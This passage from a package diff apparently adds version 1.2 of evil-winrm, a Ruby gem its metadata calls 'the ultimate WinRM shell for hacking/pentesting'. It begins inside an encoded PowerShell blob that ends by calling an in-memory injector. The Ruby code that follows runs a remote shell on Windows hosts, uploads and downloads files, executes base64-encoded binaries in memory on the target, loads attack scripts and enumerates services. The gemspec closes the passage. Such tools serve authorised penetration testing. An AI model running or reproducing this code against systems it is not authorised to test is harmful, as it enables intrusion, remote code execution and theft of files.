DAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDApKSB8IG91dC1udWxsIApbQ2FiZXNoYS5JbmplY3Rvcl06OkV4ZWN1dGUoJGFyZ3VtZW50b3MpCn0=")
|
|
147
|
+
|
|
148
|
+
class String def tokenize
|
|
149
|
+
self.
|
|
150
|
+
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
|
|
151
|
+
select {|s| not s.empty? }.
|
|
152
|
+
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
|
|
153
|
+
end
|
|
154
|
+
end
|
|
155
|
+
|
|
156
|
+
LIST = ['upload', 'download', 'exit', 'menu', 'services'].sort
|
|
157
|
+
|
|
158
|
+
silent_warnings do
|
|
159
|
+
LIST = LIST + functions
|
|
160
|
+
end
|
|
161
|
+
|
|
162
|
+
completion =
|
|
163
|
+
proc do |str|
|
|
164
|
+
case
|
|
165
|
+
when Readline.line_buffer =~ /help.*/i
|
|
166
|
+
puts("#{LIST.join("\t")}")
|
|
167
|
+
when Readline.line_buffer =~ /Invoke-Binary.*/i
|
|
168
|
+
executables.grep( /^#{Regexp.escape(str)}/i ) unless str.nil?
|
|
169
|
+
when Readline.line_buffer =~ /upload.*/i
|
|
170
|
+
paths = paths(str)
|
|
171
|
+
paths.grep( /^#{Regexp.escape(str)}/i ) unless str.nil?
|
|
172
|
+
else
|
|
173
|
+
LIST.grep( /^#{Regexp.escape(str)}/i ) unless str.nil?
|
|
174
|
+
end
|
|
175
|
+
end
|
|
176
|
+
|
|
177
|
+
Readline.completion_proc = completion
|
|
178
|
+
Readline.completion_append_character = ''
|
|
179
|
+
|
|
180
|
+
command = ""
|
|
181
|
+
|
|
182
|
+
begin
|
|
183
|
+
print_message("Establishing connection to remote endpoint", TYPE_INFO)
|
|
184
|
+
conn.shell(:powershell) do |shell|
|
|
185
|
+
until command == "exit" do
|
|
186
|
+
|
|
187
|
+
pwd = shell.run("(get-location).path").output.strip
|
|
188
|
+
command = Readline.readline("*Evil-WinRM*".red + " PS ".yellow + pwd + "> ", true) # True for command history
|
|
189
|
+
|
|
190
|
+
if command.start_with?('upload') then
|
|
191
|
+
upload_command = command.tokenize
|
|
192
|
+
command = ""
|
|
193
|
+
|
|
194
|
+
# If the file to upload exists in current dir, is not needed to set upload name, otherwise must be done
|
|
195
|
+
if upload_command[2].to_s.empty? then upload_command[2] = "." end
|
|
196
|
+
begin
|
|
197
|
+
print_message("Uploading " + upload_command[1] + " to " + upload_command[2], TYPE_INFO)
|
|
198
|
+
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes|
|
|
199
|
+
print_message("#{bytes_copied} bytes of #{total_bytes} bytes copied", TYPE_DATA)
|
|
200
|
+
print_message("Upload successful!", TYPE_INFO)
|
|
201
|
+
end
|
|
202
|
+
rescue
|
|
203
|
+
print_message("Upload failed. Check file names", TYPE_ERROR)
|
|
204
|
+
end
|
|
205
|
+
|
|
206
|
+
elsif command.start_with?('download') then
|
|
207
|
+
download_command = command.tokenize
|
|
208
|
+
command = ""
|
|
209
|
+
|
|
210
|
+
# If the file to download exists in current dir, is not needed to set download name, otherwise must be done
|
|
211
|
+
if download_command[2].to_s.empty? then download_command[2] = download_command[1] end
|
|
212
|
+
begin
|
|
213
|
+
print_message("Downloading " + download_command[1] + " to " + download_command[2], TYPE_INFO)
|
|
214
|
+
file_manager.download(download_command[1], download_command[2])
|
|
215
|
+
print_message("Download successful!", TYPE_INFO)
|
|
216
|
+
rescue
|
|
217
|
+
print_message("Download failed. Check file names", TYPE_ERROR)
|
|
218
|
+
end
|
|
219
|
+
|
|
220
|
+
elsif command.start_with?('Invoke-Binary') then
|
|
221
|
+
begin
|
|
222
|
+
invoke_Binary = command.tokenize
|
|
223
|
+
command = ""
|
|
224
|
+
load_executable = invoke_Binary[1]
|
|
225
|
+
load_executable = File.binread(load_executable)
|
|
226
|
+
load_executable = Base64.strict_encode64(load_executable)
|
|
227
|
+
|
|
228
|
+
if !invoke_Binary[4].to_s.empty? && invoke_Binary[5].to_s.empty?
|
|
229
|
+
output = shell.run("Invoke-Binary " + load_executable + "," + invoke_Binary[2] + "," + invoke_Binary[3] + "," + invoke_Binary[4])
|
|
230
|
+
elsif !invoke_Binary[3].to_s.empty? && invoke_Binary[4].to_s.empty?
|
|
231
|
+
output = shell.run("Invoke-Binary " + load_executable + "," + invoke_Binary[2] + "," + invoke_Binary[3])
|
|
232
|
+
elsif !invoke_Binary[2].to_s.empty? && invoke_Binary[3].to_s.empty?
|
|
233
|
+
output = shell.run("Invoke-Binary " + load_executable + "," + invoke_Binary[2])
|
|
234
|
+
elsif invoke_Binary[2].to_s.empty?
|
|
235
|
+
output = shell.run("Invoke-Binary " + load_executable)
|
|
236
|
+
end
|
|
237
|
+
print(output.output)
|
|
238
|
+
rescue
|
|
239
|
+
print_message("Check file names", TYPE_ERROR)
|
|
240
|
+
end
|
|
241
|
+
|
|
242
|
+
elsif command.start_with?('services') then
|
|
243
|
+
command = ""
|
|
244
|
+
output = shell.run('Get-ItemProperty "registry::HKLM\System\CurrentControlSet\Services\*" | Where-Object {$_.imagepath -notmatch "system" -and $_.imagepath -ne $null } | Select-Object pschildname,imagepath | fl')
|
|
245
|
+
print(output.output.chomp)
|
|
246
|
+
|
|
247
|
+
elsif command.start_with?(*functions) then
|
|
248
|
+
silent_warnings do
|
|
249
|
+
load_script = $scripts_path + command
|
|
250
|
+
command = ""
|
|
251
|
+
load_script = load_script.gsub(" ","")
|
|
252
|
+
load_script = File.binread(load_script)
|
|
253
|
+
output = shell.run(load_script)
|
|
254
|
+
end
|
|
255
|
+
|
|
256
|
+
elsif command.start_with?('menu') then
|
|
257
|
+
command = ""
|
|
258
|
+
silent_warnings do
|
|
259
|
+
output = shell.run(menu)
|
|
260
|
+
output = shell.run("Menu")
|
|
261
|
+
autocomplete = shell.run("auto").output.chomp
|
|
262
|
+
autocomplete = autocomplete.gsub!(/\r\n?/, "\n")
|
|
263
|
+
LIST2 = autocomplete.split("\n")
|
|
264
|
+
LIST = LIST + LIST2
|
|
265
|
+
print(output.output)
|
|
266
|
+
end
|
|
267
|
+
end
|
|
268
|
+
|
|
269
|
+
output = shell.run(command) do |stdout, stderr|
|
|
270
|
+
STDOUT.print(stdout)
|
|
271
|
+
STDERR.print(stderr)
|
|
272
|
+
end
|
|
273
|
+
end
|
|
274
|
+
|
|
275
|
+
custom_exit(0)
|
|
276
|
+
end
|
|
277
|
+
rescue
|
|
278
|
+
print_message("Can't establish connection. Check connection params", TYPE_ERROR)
|
|
279
|
+
custom_exit(1)
|
|
280
|
+
end
|
metadata
ADDED
|
@@ -0,0 +1,117 @@
|
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
|
2
|
+
name: evil-winrm
|
|
3
|
+
version: !ruby/object:Gem::Version
|
|
4
|
+
version: '1.2'
|
|
5
|
+
platform: ruby
|
|
6
|
+
authors:
|
|
7
|
+
- CyberVaca
|
|
8
|
+
- OscarAkaElvis
|
|
9
|
+
- jarilaos
|
|
10
|
+
- vis0r
|
|
11
|
+
autorequire:
|
|
12
|
+
bindir: bin
|
|
13
|
+
cert_chain: []
|
|
14
|
+
date: 2019-07-14 00:00:00.000000000 Z
|
|
15
|
+
dependencies:
|
|
16
|
+
- !ruby/object:Gem::Dependency
|
|
17
|
+
name: winrm
|
|
18
|
+
requirement: !ruby/object:Gem::Requirement
|
|
19
|
+
requirements:
|
|
20
|
+
- - ">="
|
|
21
|
+
- !ruby/object:Gem::Version
|
|
22
|
+
version: 2.3.2
|
|
23
|
+
type: :runtime
|
|
24
|
+
prerelease: false
|
|
25
|
+
version_requirements: !ruby/object:Gem::Requirement
|
|
26
|
+
requirements:
|
|
27
|
+
- - ">="
|
|
28
|
+
- !ruby/object:Gem::Version
|
|
29
|
+
version: 2.3.2
|
|
30
|
+
- !ruby/object:Gem::Dependency
|
|
31
|
+
name: winrm-fs
|
|
32
|
+
requirement: !ruby/object:Gem::Requirement
|
|
33
|
+
requirements:
|
|
34
|
+
- - ">="
|
|
35
|
+
- !ruby/object:Gem::Version
|
|
36
|
+
version: 1.3.2
|
|
37
|
+
type: :runtime
|
|
38
|
+
prerelease: false
|
|
39
|
+
version_requirements: !ruby/object:Gem::Requirement
|
|
40
|
+
requirements:
|
|
41
|
+
- - ">="
|
|
42
|
+
- !ruby/object:Gem::Version
|
|
43
|
+
version: 1.3.2
|
|
44
|
+
- !ruby/object:Gem::Dependency
|
|
45
|
+
name: readline
|
|
46
|
+
requirement: !ruby/object:Gem::Requirement
|
|
47
|
+
requirements:
|
|
48
|
+
- - ">="
|
|
49
|
+
- !ruby/object:Gem::Version
|
|
50
|
+
version: '0'
|
|
51
|
+
type: :runtime
|
|
52
|
+
prerelease: false
|
|
53
|
+
version_requirements: !ruby/object:Gem::Requirement
|
|
54
|
+
requirements:
|
|
55
|
+
- - ">="
|
|
56
|
+
- !ruby/object:Gem::Version
|
|
57
|
+
version: '0'
|
|
58
|
+
- !ruby/object:Gem::Dependency
|
|
59
|
+
name: stringio
|
|
60
|
+
requirement: !ruby/object:Gem::Requirement
|
|
61
|
+
requirements:
|
|
62
|
+
- - ">="
|
|
63
|
+
- !ruby/object:Gem::Version
|
|
64
|
+
version: 0.0.2
|
|
65
|
+
type: :runtime
|
|
66
|
+
prerelease: false
|
|
67
|
+
version_requirements: !ruby/object:Gem::Requirement
|
|
68
|
+
requirements:
|
|
69
|
+
- - ">="
|
|
70
|
+
- !ruby/object:Gem::Version
|
|
71
|
+
version: 0.0.2
|
|
72
|
+
- !ruby/object:Gem::Dependency
|
|
73
|
+
name: colorize
|
|
74
|
+
requirement: !ruby/object:Gem::Requirement
|
|
75
|
+
requirements:
|
|
76
|
+
- - ">="
|
|
77
|
+
- !ruby/object:Gem::Version
|
|
78
|
+
version: 0.8.1
|
|
79
|
+
type: :runtime
|
|
80
|
+
prerelease: false
|
|
81
|
+
version_requirements: !ruby/object:Gem::Requirement
|
|
82
|
+
requirements:
|
|
83
|
+
- - ">="
|
|
84
|
+
- !ruby/object:Gem::Version
|
|
85
|
+
version: 0.8.1
|
|
86
|
+
description: The ultimate WinRM shell for hacking/pentesting
|
|
87
|
+
email: oscar.alfonso.diaz@gmail.com
|
|
88
|
+
executables: []
|
|
89
|
+
extensions: []
|
|
90
|
+
extra_rdoc_files: []
|
|
91
|
+
files:
|
|
92
|
+
- lib/evil-winrm.rb
|
|
93
|
+
homepage: https://github.com/Hackplayers/evil-winrm
|
|
94
|
+
licenses:
|
|
95
|
+
- LGPL-3.0
|
|
96
|
+
metadata: {}
|
|
97
|
+
post_install_message: Check documentation at https://github.com/Hackplayers/evil-winrm
|
|
98
|
+
rdoc_options: []
|
|
99
|
+
require_paths:
|
|
100
|
+
- lib
|
|
101
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
|
102
|
+
requirements:
|
|
103
|
+
- - ">="
|
|
104
|
+
- !ruby/object:Gem::Version
|
|
105
|
+
version: '2.3'
|
|
106
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
|
107
|
+
requirements:
|
|
108
|
+
- - ">="
|
|
109
|
+
- !ruby/object:Gem::Version
|
|
110
|
+
version: '0'
|
|
111
|
+
requirements: []
|
|
112
|
+
rubyforge_project:
|
|
113
|
+
rubygems_version: 2.7.6.2
|
|
114
|
+
signing_key:
|
|
115
|
+
specification_version: 4
|
|
116
|
+
summary: Evil-WinRM
|
|
117
|
+
test_files: []
|